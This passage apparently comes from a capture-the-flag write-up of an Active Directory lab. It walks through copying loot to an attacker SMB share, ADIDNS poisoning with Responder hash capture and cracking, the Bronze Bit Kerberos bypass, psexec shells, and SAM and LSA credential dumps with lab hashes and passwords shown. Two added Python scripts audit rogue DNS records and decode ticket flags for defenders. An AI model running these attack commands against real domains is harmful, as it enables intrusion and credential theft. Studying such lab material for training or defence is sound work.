	Renew Time: 5/5/2023 19:56:11 (local)
	Session Key Type: AES-128-CTS-HMAC-SHA1-96
	Cache Flags: 0 
	Kdc Called: 

PS C:\Users\Administrator\Documents>

If we first try to reach the WEB host's page by IP from the browser on this machine, it returns a 401.2 error because we are not authorized

However, doing it from the PowerShell session where our ticket is imported, it authenticates to the site with that ticket and now returns status code 200

PS C:\Users\Administrator\Documents> Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials http://web.htb.local | Select StatusCode  

StatusCode
----------
       200

PS C:\Users\Administrator\Documents>

We can request the page and save its content to a file named output.html

PS C:\Users\Administrator\Documents> Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials -Uri http://web.htb.local -OutFile output.html  
PS C:\Users\Administrator\Documents>

Finally, as before, we set up an SMB server to which we copy the file

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

PS C:\Users\Administrator\Documents> cp output.html \\10.10.14.10\kali\output.html  
PS C:\Users\Administrator\Documents>

We open output.html in the browser and find a KeeWeb vault that contains, under the domain web.htb.local, the user remote_user and their password

Since the user is called remote_user, we test whether the credentials are valid by authenticating over WinRM against web.htb.local; it returns Pwn3d!

❯ crackmapexec winrm web.htb.local -u remote_user -p 'FZg28$dJe*Hx7c'
SMB         web.htb.local   5985   WEB              [*] Windows 6.3 Build 9600 (name:WEB) (domain:htb.local)  
HTTP        web.htb.local   5985   WEB              [*] http://web.htb.local:5985/wsman
WINRM       web.htb.local   5985   WEB              [+] htb.local\remote_user:FZg28$dJe*Hx7c (Pwn3d!)

We can simply connect with evil-winrm and read the flag on the desktop

❯ evil-winrm -i web.htb.local -u remote_user -p 'FZg28$dJe*Hx7c'  
PS C:\Users\remote_user.HTB\Documents> whoami
htb\remote_user
PS C:\Users\remote_user.HTB\Documents> type ..\Desktop\flag.txt
HADES{From_RBCD_To_p4s5word_v@Ult}
PS C:\Users\remote_user.HTB\Documents>


Celestial

HADES{Why_llmnr_wh3n_y0u_got_adidns}


In the Program Files directory we can see that Wireshark is installed

PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         8/19/2019   9:20 PM            Common Files
d----          9/3/2019   9:10 PM            Docker Toolbox
d----          9/3/2019   9:11 PM            Git
d----         3/21/2014  11:09 AM            Internet Explorer
d----         8/25/2019  12:37 PM            Npcap
d----          9/3/2019   9:12 PM            Oracle
d----         10/2/2019   4:30 PM            Update Services
d----         8/19/2019   9:22 PM            VMware
d----         10/3/2019   2:21 AM            WindowsPowerShell  
d----         8/25/2019  12:38 PM            Wireshark

PS C:\Program Files>

We enter that directory and use tshark to capture all traffic on the Ethernet0 interface, saving the output as capture.pcap

PS C:\Program Files\Wireshark> .\tshark.exe -i Ethernet0 -w C:\ProgramData\capture.pcap  
Capturing on 'Ethernet0'
^C
PS C:\Program Files\Wireshark>

We open the capture in Wireshark and can see that some DNS requests were made for the subdomains db1, db2 and db3 of htb.local

Hoping to capture some traffic carrying some form of authentication, we start by uploading the Powermad.ps1 module again and importing it

PS C:\Users\remote_user.HTB\Documents> upload Powermad.ps1

Info: Uploading Powermad.ps1 to C:\Users\remote_user.HTB\Documents\Powermad.ps1  

Data: 180768 bytes of 180768 bytes copied

Info: Upload successful!

PS C:\Users\remote_user.HTB\Documents> Import-Module .\Powermad.ps1
PS C:\Users\remote_user.HTB\Documents>

Authenticated users can modify DNS, so we define remote_user's credentials and make db1 point to our VPN IP

PS C:\Users\remote_user.HTB\Documents> $SecPassword = ConvertTo-SecureString 'FZg28$dJe*Hx7c' -AsPlainText -Force
PS C:\Users\remote_user.HTB\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\remote_user', $SecPassword)
PS C:\Users\remote_user.HTB\Documents> New-ADIDNSNode -Node db1 -Data 10.10.14.10 -DomainController dc1.htb.local -Domain htb.local -Zone htb.local -Credential $Cred -Forest htb.local  
PS C:\Users\remote_user.HTB\Documents>

Now we can verify that db1.htb.local points to our IP address

PS C:\Users\remote_user.HTB\Documents> nslookup db1 192.168.3.203  

DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  192.168.3.203

Name:    db1.htb.local
Address:  10.10.14.10

PS C:\Users\remote_user.HTB\Documents>
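The two things a defender would want to check for after seeing this (hosts repeatedly asking the DC for names that do not exist in the zone, and zone records that point outside the network the domain lives in) can be scripted. The following is an added example, not part of the original write-up or of any of the tools it uses: the tshark-style log lines are constructed to mirror the db1/db2/db3 lookups seen in the capture, the zone snapshot and the authorized address range are assumptions, and 10.10.14.10 is the VPN address used above.

```python
"""Audit helpers for the two ADIDNS conditions shown above: hosts that keep
asking the DC for names with no record in the zone, and A records in the
zone that point outside the address space the domain is supposed to use.

Added example, not part of the original write-up. The log lines are
constructed in the style of a tshark summary; the zone snapshot and the
internal ranges are assumptions.
"""
import ipaddress
import re
from collections import Counter

# Constructed tshark-style summary lines: WEB (192.168.3.202) asking
# DC1 (192.168.3.203) for the db1/db2/db3 names seen in the capture.
SAMPLE_DNS_LOG = """\
192.168.3.202 -> 192.168.3.203 DNS Standard query 0x1a2b A db1.htb.local
192.168.3.203 -> 192.168.3.202 DNS Standard query response 0x1a2b No such name A db1.htb.local
192.168.3.202 -> 192.168.3.203 DNS Standard query 0x1a2c A db2.htb.local
192.168.3.203 -> 192.168.3.202 DNS Standard query response 0x1a2c No such name A db2.htb.local
192.168.3.202 -> 192.168.3.203 DNS Standard query 0x1a2d A db3.htb.local
192.168.3.203 -> 192.168.3.202 DNS Standard query response 0x1a2d No such name A db3.htb.local
192.168.3.202 -> 192.168.3.203 DNS Standard query 0x1a2e A dc1.htb.local
192.168.3.203 -> 192.168.3.202 DNS Standard query response 0x1a2e A dc1.htb.local A 192.168.3.203
192.168.3.202 -> 192.168.3.203 DNS Standard query 0x1a2f A db1.htb.local
192.168.3.203 -> 192.168.3.202 DNS Standard query response 0x1a2f No such name A db1.htb.local
"""

# Assumed snapshot of the zone's A records after the db1 node created in the
# write-up (10.10.14.10 is the VPN address) has been added.
ZONE_A_RECORDS = {
    "dc1.htb.local": "192.168.3.203",
    "web.htb.local": "192.168.3.202",
    "dev.htb.local": "192.168.3.201",
    "db1.htb.local": "10.10.14.10",
}

# Assumption: the only address space domain hosts are allowed to resolve to.
INTERNAL_RANGES = [ipaddress.ip_network("192.168.3.0/24")]

NXDOMAIN_RE = re.compile(r"No such name A (\S+)$")


def nxdomain_counts(log: str) -> dict:
    """Count NXDOMAIN answers per queried name. Recurring failures for names
    inside your own zone deserve a ticket: register them properly or fix the
    client that keeps asking for them."""
    counts = Counter()
    for line in log.splitlines():
        m = NXDOMAIN_RE.search(line.strip())
        if m:
            counts[m.group(1).lower()] += 1
    return dict(counts)


def is_internal(ip: str, ranges=INTERNAL_RANGES) -> bool:
    """True when the address lies inside one of the authorized ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ranges)


def rogue_records(zone: dict, ranges=INTERNAL_RANGES) -> list:
    """Names whose A record points outside the authorized ranges."""
    return sorted(name for name, ip in zone.items() if not is_internal(ip, ranges))


def report(log: str = SAMPLE_DNS_LOG, zone: dict = ZONE_A_RECORDS) -> dict:
    """Combine both findings into one structure suitable for alerting."""
    return {
        "claimable_names": nxdomain_counts(log),
        "rogue_records": rogue_records(zone),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

Run against the constructed input it reports db1.htb.local twice and db2/db3 once as names the DC could not answer, and db1.htb.local as the only record resolving outside 192.168.3.0/24. In a real environment the zone snapshot would come from a dump of the DomainDnsZones partition and the log from the capture taken with tshark above.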

After a few minutes listening with Responder, we receive an authenticated request from Administrator along with their NTLMv2 hash

❯ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.13.38.16
[SMB] NTLMv2-SSP Username : \administrator
[SMB] NTLMv2-SSP Hash     : administrator...

At first john fails to crack the hash with rockyou.txt, but after applying some rules we obtain the password Myp@ssw0rd for Administrator

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash --rules:d3ad0ne
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
Myp@ssw0rd       (ADMINISTRATOR)
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably  
Session completed.

With crackmapexec we check Administrator's password as a local account against the WEB host; it is valid for both SMB and WinRM

❯ crackmapexec winrm web.htb.local -u Administrator -p Myp@ssw0rd --local-auth
SMB         web.htb.local   5985   WEB              [*] Windows 6.3 Build 9600 (name:WEB) (domain:WEB)  
HTTP        web.htb.local   5985   WEB              [*] http://web.htb.local:5985/wsman
WINRM       web.htb.local   5985   WEB              [+] WEB\Administrator:Myp@ssw0rd (Pwn3d!)

We connect to WEB as Administrator, where we can read the flag

❯ evil-winrm -i web.htb.local -u Administrator -p Myp@ssw0rd  
PS C:\Users\Administrator\Documents> whoami
web\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
HADES{Why_llmnr_wh3n_y0u_got_adidns}
PS C:\Users\Administrator\Documents>


Dominion

HADES{Tam1ng_Kerber0s_Wi1l_gRant_4cCess_t0_H4des}


When we try to reuse Administrator's password, this time against DC1 at the domain level, it returns an error saying the account is restricted

❯ crackmapexec smb dc1.htb.local -u Administrator -p Myp@ssw0rd
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [-] htb.local\Administrator:Myp@ssw0rd STATUS_ACCOUNT_RESTRICTION

This is because the Administrator user, as we can see in BloodHound, belongs to the Protected Users group and cannot authenticate over SMB

The workaround is very simple since the restriction only applies to SMB: adding the -k parameter to authenticate via Kerberos returns Pwn3d!, so the password is valid

❯ crackmapexec smb dc1.htb.local -u Administrator -p Myp@ssw0rd -k
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\Administrator:Myp@ssw0rd (Pwn3d!)

There are several ways to run commands on the DC; one of them is simply to define the credentials and run commands with Invoke-Command against DC1

PS C:\Users\Administrator\Documents> $SecPassword = ConvertTo-SecureString 'Myp@ssw0rd' -AsPlainText -Force
PS C:\Users\Administrator\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\Administrator', $SecPassword)  
PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc1 -Credential $Cred -Command { whoami }
htb\administrator
PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc1 -Credential $Cred -Command { hostname }
dc1
PS C:\Users\Administrator\Documents>

We simply connect to DC1 with psexec, using the -k parameter to authenticate via Kerberos, and get a cmd as nt authority\system

❯ impacket-psexec htb.local/Administrator:Myp@ssw0rd@dc1.htb.local -k  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc1.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file KZKXLYRd.exe
[*] Opening SVCManager on dc1.htb.local.....
[*] Creating service YklQ on dc1.htb.local.....
[*] Starting service YklQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
dc1

C:\Windows\system32>

Another way is to request a ticket with getTGT and load it through the KRB5CCNAME variable

❯ impacket-getTGT htb.local/Administrator:Myp@ssw0rd  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Saving ticket in Administrator.ccache

❯ export KRB5CCNAME=Administrator.ccache

We can verify the authentication with crackmapexec simply by telling it to use the ticket in the credential cache; again it returns Pwn3d!

❯ crackmapexec smb dc1.htb.local -k --use-kcache
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\ from ccache (Pwn3d!)

We connect again with psexec, this time just using the ticket

❯ impacket-psexec htb.local/Administrator@dc1.htb.local -k -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc1.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file QMiaZJce.exe
[*] Opening SVCManager on dc1.htb.local.....
[*] Creating service MiCD on dc1.htb.local.....
[*] Starting service MiCD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
dc1

C:\Windows\system32>

To remove the SMB restriction it is enough to remove the Administrator user from the global group Protected Users using the net group /del command

C:\Windows\system32> net group "Protected Users" Administrator /del  
The command completed successfully.

C:\Windows\system32>

Now we authenticate normally over SMB to every host in the domain; the credentials are valid and we have compromised all the machines

❯ crackmapexec smb 192.168.3.201-203 -u Administrator -p Myp@ssw0rd
SMB         192.168.3.202   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         192.168.3.201   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         192.168.3.203   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         192.168.3.202   445    WEB              [+] htb.local\Administrator:Myp@ssw0rd (Pwn3d!)
SMB         192.168.3.201   445    DEV              [+] htb.local\Administrator:Myp@ssw0rd (Pwn3d!)
SMB         192.168.3.203   445    DC1              [+] htb.local\Administrator:Myp@ssw0rd (Pwn3d!)

We can simply connect to DC1 with evil-winrm and read the last flag

❯ evil-winrm -i dc1.htb.local -u Administrator -p Myp@ssw0rd  
PS C:\Users\Administrator.HTB\Documents> whoami
htb\administrator
PS C:\Users\Administrator.HTB\Documents> type ..\Desktop\flag.txt
HADES{Tam1ng_Kerber0s_Wi1l_gRant_4cCess_t0_H4des}
PS C:\Users\Administrator.HTB\Documents>


Extra 1

CVE-2020-17049 - WEB Administrator


In the GenericAll attack against the WEB host we had seen that it would not let us generate the ticket impersonating the Administrator user, so we did it as lee

PS C:\Users\Administrator\Documents> .\Rubeus.exe s4u /user:attackersystem$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:cifs/web.htb.local /domain:htb.local /ptt /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'htb.local\attackersystem$'
[*] Using domain controller: 192.168.3.203:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      ...

[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'attackersystem$@HTB.LOCAL'
[*] base64(ticket.kirbi):

      doIFQjCCBT6gAwIBBaEDAgEWooIEXTCCBFlhggRVMIIEUaADAgEFoQsbCUhUQi5MT0NBTKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKOCBB0wggQZoAMCARehAwIBAaKCBAsEggQHTL+GuDZPlk5wM4gCQHNwMYcbXExh8ZNxVWSEIlU6MxJScLeuXN/nqQwkqNDU3LyjwMqZ6ZcGSNCzijKfe5A/SFnPeGPpmptc3nvurcdolSJ2kpkNfVXnDBRQBMGTs3B7R47ofzP51wSRA8T8rLMku3Aw2ZbPP9T9t6jZ0VAkwqusFrJ2027iwMuHxQZaDBBuEuyt1lnPVNOYcqsyJL/3YN54SzeD4+r+NBhGawr9p6PT5O9aeKmNKbpovbdPoDTrwZju3zC5L0jSs8Bpmxye2fh9xzDs/hteAg+LD277lrm+7cAb8OuLLbFWijBduJBRXHXCDnOAavyCNjvbB3eKf6qUsNbZb88y5YoI9hty2LWGMwuyv4dQVtShDtBf58zKtPtf2XYT3qDtiAKD2t+l4sRX+eTqnsRB7KdVmzHq13X24HJrvn8zzTGrgyiVtEY/qggRrIQTdcQKztCOTzr/G0mcgB0EOYDIOSvczdMc1ysZcWrC9OMjMqzqbtjU2GdvNd1NAVKBdINsiy4Zvb2UcIzIz1ybAVGbTn6VUFxbgG0p/OGgHN3vD1bYRy5Go58ewuHHF6P2WzubWAPHT3BLPgLedbsntj/vpVKzAPMZV6JB1YGCxfnq16U9YUs/tAc2iz3JCTiTmVqv5lsRO5RYawuU0UPA9Stokt9/kQFtZstaPFb/Q3M+AYvwY7Jvmko8h4EJUHW9iGOWRW4aSgc/Nn12jVrzvILTUqpOT+xRydTE5SK8ObsvR2GBpCAyyPigRy/JMvsQXzU0uCHoNyBIV692YTlxhXDCzww0RGM4FcevlyO4zNg8d+CEEmzq2MO5LAl1sSgq1Cz9QRP/ABP7zP3tANce4/9GE//PEtAOA0JrqFGwuAHGeH75ZxrS+0+K489OOMLf+5O6sN4k7bWGHTAIGWxceHn4R8ZzOWSP169BXD8mmy2cOSoRNr3NqKqGtZwfEwjpMsXtxW+5BLDXTwQOW5P5gu2rl4nllx7/S9HTmPC0SNWwwg+HwtHwVkG51aroChhxXzcQFMiun97eenEYUNBy/94v95ynHNFpRDYnniNWADcrdXM2mqXf8NYjoy7otegXcLrVJw09tyC7QMyCCwqXnFA1/i7njdfABVNmPGDknZ8SFfZ7JnDklJiEkq5R0U3A/nWUaFIq7/tDEbNO0X3oGjYu0xJayNI8b8QyTQdrwmw1+rJ6MM3ZAkxcvEdEGRhXSwkjVqeaGfHblHRX25EerWKkhZfWcHECUFFgKbhOczc7jdl0y2GOh1QRc7Xx6qC5CMCs4TRjI+iKwIWM7fL5bpeuNqWZog8ziZT0G7dWHk6NKMTwfPhJU9TxtD8xYl6CTUCxR09w+s5OTXTCw+Kq4JOjgdAwgc2gAwIBAKKBxQSBwn2BvzCBvKCBuTCBtjCBs6AbMBmgAwIBF6ESBBB9JGEFheiVht8O+2GfLGDmoQsbCUhUQi5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3KjBwMFAAChAAClERgPMjAyMzA1MTkxOTUwNThaphEYDzIwMjMwNTIwMDU1MDU3WqcRGA8yMDIzMDUyNjE5NTA1N1qoCxsJSFRCLkxPQ0FMqRwwGqADAgEBoRMwERsPYXR0YWNrZXJzeXN0ZW0k  

[*] Impersonating user 'Administrator' to target SPN 'cifs/web.htb.local'
[*] Building S4U2proxy request for service: 'cifs/web.htb.local'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2proxy request to domain controller 192.168.3.203:88

[X] KRB-ERROR (13) : KDC_ERR_BADOPTION

PS C:\Users\Administrator\Documents>

There is an alternative method, exploiting CVE-2020-17049 or the Bronze Bit attack, which lets us forge the ticket when we are a service account; luckily Rubeus covers this with just the /bronzebit parameter, and with it the ticket impersonating the Administrator user is generated without problems

PS C:\Users\Administrator\Documents> .\Rubeus.exe s4u /user:attackersystem$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:cifs/web.htb.local /domain:htb.local /ptt /nowrap /bronzebit

   ______        _                       
  (_____ \      | |                      
   _____) )_   _| |__  _____ _   _  ___  
  |  __  /| | | |  _ \| ___ | | | |/___) 
  | |  \ \| |_| | |_) ) ____| |_| |___ | 
  |_|   |_|____/|____/|_____)____/(___/  

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'htb.local\attackersystem$' 
[*] Using domain controller: 192.168.3.203:88 
[+] TGT request successful! 
[*] base64(ticket.kirbi):

      ...

[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Bronze Bit flag passed, flipping forwardable flag on. Original flags: name_canonicalize, pre_authent, renewable
[*] Flags changed to: name_canonicalize, pre_authent, renewable, forwardable
[*] Got a TGS for 'Administrator' to 'attackersystem$@HTB.LOCAL'
[*] base64(ticket.kirbi):

      ...

[*] Impersonating user 'Administrator' to target SPN 'cifs/web.htb.local'
[*] Building S4U2proxy request for service: 'cifs/web.htb.local'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2proxy request to domain controller 192.168.3.203:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/web.htb.local':

      ...

[+] Ticket successfully imported!

PS C:\Users\Administrator\Documents>
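The flag change Rubeus reports above (name_canonicalize, pre_authent, renewable gaining forwardable) and the `Ticket Flags 0x40a10000` line klist printed earlier for lee's service ticket are the same information in two forms. The following added example, which is not from the write-up, Rubeus or Impacket, decodes the TicketFlags bit field according to RFC 4120 and parses klist output so the two can be checked against each other; the klist text embedded in it is copied from the output shown earlier on this page.

```python
"""Decode and re-encode the Kerberos TicketFlags bit field (RFC 4120
section 5.4.1), and pull the flags out of ``klist`` output.

Added example, not part of the write-up nor of Rubeus/Impacket. The sample
klist text is copied from the output shown earlier on this page. Bit 0 is
the most significant bit of the 32-bit field, as in the RFC.
"""
import re

# RFC 4120 TicketFlags, indexed by bit number counted from the MSB.
TICKET_FLAG_BITS = {
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may_postdate", 6: "postdated", 7: "invalid", 8: "renewable",
    9: "initial", 10: "pre_authent", 11: "hw_authent",
    12: "transited_policy_checked", 13: "ok_as_delegate",
    14: "anonymous", 15: "name_canonicalize",
}
FLAG_NAME_TO_MASK = {name: 1 << (31 - bit) for bit, name in TICKET_FLAG_BITS.items()}

# klist output for lee's http/web.htb.local ticket, as shown on this page.
SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>\tClient: lee @ HTB.LOCAL
\tServer: http/web.htb.local @ HTB.LOCAL
\tKerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
\tTicket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
\tStart Time: 4/28/2023 19:56:12 (local)
\tEnd Time:   4/29/2023 5:56:11 (local)
"""


def decode_ticket_flags(value: int) -> list:
    """Return the names of the set bits, in RFC bit order."""
    return [name for bit, name in sorted(TICKET_FLAG_BITS.items())
            if value & (1 << (31 - bit))]


def encode_ticket_flags(names) -> int:
    """Inverse of decode_ticket_flags; an unknown name raises KeyError."""
    value = 0
    for name in names:
        value |= FLAG_NAME_TO_MASK[name]
    return value


def is_forwardable(value: int) -> bool:
    """The single bit that decides whether an S4U2self ticket can be used
    in S4U2proxy; it is what the Bronze Bit output above shows flipping."""
    return bool(value & FLAG_NAME_TO_MASK["forwardable"])


def parse_klist(text: str) -> list:
    """Extract client, server and raw flag value for each cached ticket."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"#\d+>\s*Client:\s*(.+)", line)
        if m:
            entries.append({"client": m.group(1).strip(), "server": None, "flags": 0})
            continue
        if not entries:
            continue
        m = re.match(r"Server:\s*(.+)", line)
        if m:
            entries[-1]["server"] = m.group(1).strip()
            continue
        m = re.match(r"Ticket Flags\s+(0x[0-9a-fA-F]+)", line)
        if m:
            entries[-1]["flags"] = int(m.group(1), 16)
    return entries


if __name__ == "__main__":
    for entry in parse_klist(SAMPLE_KLIST):
        print(entry["client"], "->", entry["server"],
              hex(entry["flags"]), decode_ticket_flags(entry["flags"]))
```

Encoding the three flags Rubeus lists as the original set gives 0x00a10000; adding forwardable gives exactly the 0x40a10000 that klist printed for lee's ticket, which is why the S4U2proxy step succeeds for lee without any bit flipping while the Administrator ticket needs /bronzebit.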

With the ticket imported we can read the flag on web.htb.local through the C$ share

PS C:\Users\Administrator\Documents> type \\web.htb.local\C$\Users\Administrator\Desktop\flag.txt  
HADES{Why_llmnr_wh3n_y0u_got_adidns}
PS C:\Users\Administrator\Documents>

Another way is to take the ticket Rubeus returned while impersonating Administrator, convert it from kirbi to ccache, and then export it in the KRB5CCNAME variable

❯ base64 -d kirbi.b64 > ticket.kirbi

❯ impacket-ticketConverter ticket.kirbi WEB.ccache
Impacket v0.11.0 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done

❯ export KRB5CCNAME=WEB.ccache

Now, using the ticket for authentication, we can check against web.htb.local with crackmapexec; it is valid and returns Pwn3d!

❯ crackmapexec smb web.htb.local -k --use-kcache
SMB         web.htb.local   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         web.htb.local   445    WEB              [+] htb.local\ from ccache (Pwn3d!)

A simpler way to generate the ticket is with Impacket's getST, impersonating Administrator and using the -force-forwardable parameter to exploit the CVE

❯ impacket-getST -spn cifs/web.htb.local htb.local/'attackersystem$':123456 -impersonate Administrator -force-forwardable  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Forcing the service ticket to be forwardable
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

❯ export KRB5CCNAME=Administrator.ccache

This ticket should also be valid for authenticating against web.htb.local

❯ crackmapexec smb web.htb.local -k --use-kcache
SMB         web.htb.local   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         web.htb.local   445    WEB              [+] htb.local\ from ccache (Pwn3d!)

Using that ccache for authentication we can get a shell on WEB with psexec

❯ impacket-psexec htb.local/Administrator@web.htb.local -k -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on web.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file vmkgFQEM.exe
[*] Opening SVCManager on web.htb.local.....
[*] Creating service fbps on web.htb.local.....
[*] Starting service fbps.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
web

C:\Windows\system32>

Or dump the host's SAM with crackmapexec to see the hashes

❯ crackmapexec smb web.htb.local -k --use-kcache --sam
SMB         web.htb.local   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         web.htb.local   445    WEB              [+] htb.local\ from ccache (Pwn3d!)  
SMB         web.htb.local   445    WEB              [+] Dumping SAM hashes
SMB         web.htb.local   445    WEB              Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
SMB         web.htb.local   445    WEB              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         web.htb.local   445    WEB              [+] Added 2 SAM hashes to the database

We simply connect with evil-winrm doing pass-the-hash with Administrator's NT hash and get a PowerShell as that user on WEB

❯ evil-winrm -i web.htb.local -u Administrator -H e57231f8ebcc24a122631564147361cc  
PS C:\Users\Administrator\Documents> whoami
web\administrator
PS C:\Users\Administrator\Documents>

Although if, instead of dumping the SAM, we dump the LSA secrets, we can see Administrator's password in clear text and connect with evil-winrm

❯ crackmapexec smb web.htb.local -k --use-kcache --lsa
SMB         web.htb.local   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         web.htb.local   445    WEB              [+] htb.local\ from ccache (Pwn3d!)
SMB         web.htb.local   445    WEB              [+] Dumping LSA secrets
SMB         web.htb.local   445    WEB              HTB.LOCAL/remote_user:$DCC2$10240#remote_user#021f10dc08753a885186720dc02631c3
SMB         web.htb.local   445    WEB              HTB\WEB$:plain_password_hex:66de0e517ef565eea1a53cdfa897673babcaf88dc7f46577dc86dfbbf6b40ada8fd4dbd6dc5dd2939067f28332dfbbd68675eb00160e72fb1b4d948d58780935e050ef7030fdad86e6df08ee32ea25222d21e1ea3214227791a716904911cf4c82124e6b94c4985d6b86d54756b3915e88f0ceccea97ed77dda0b5361aab2e7aaa9010464a38965b976959a1ef769e6807f913e702c90a1d2aee4ba634a7c7f8f62aa9853799c1c21929b5254d6afb5d42e35ee2f93eb28188795781c955376cc63821c2434868ca66346542ad9fca59d128876b8c51f9456b0eb47b95d4edb627c4c7ba296407413228adcdeacaa0dc  
SMB         web.htb.local   445    WEB              HTB\WEB$:aad3b435b51404eeaad3b435b51404ee:549fd7eb92d4bd6e0352991dbc6e0a7a:::
SMB         web.htb.local   445    WEB              web\administrator:Myp@ssw0rd
SMB         web.htb.local   445    WEB              dpapi_machinekey:0x83cc5011c1ab224b85fc864cc10baec5396c0fd6
dpapi_userkey:0xc86b8a5680aaf63d34bedb4433fae5a46bfe7738
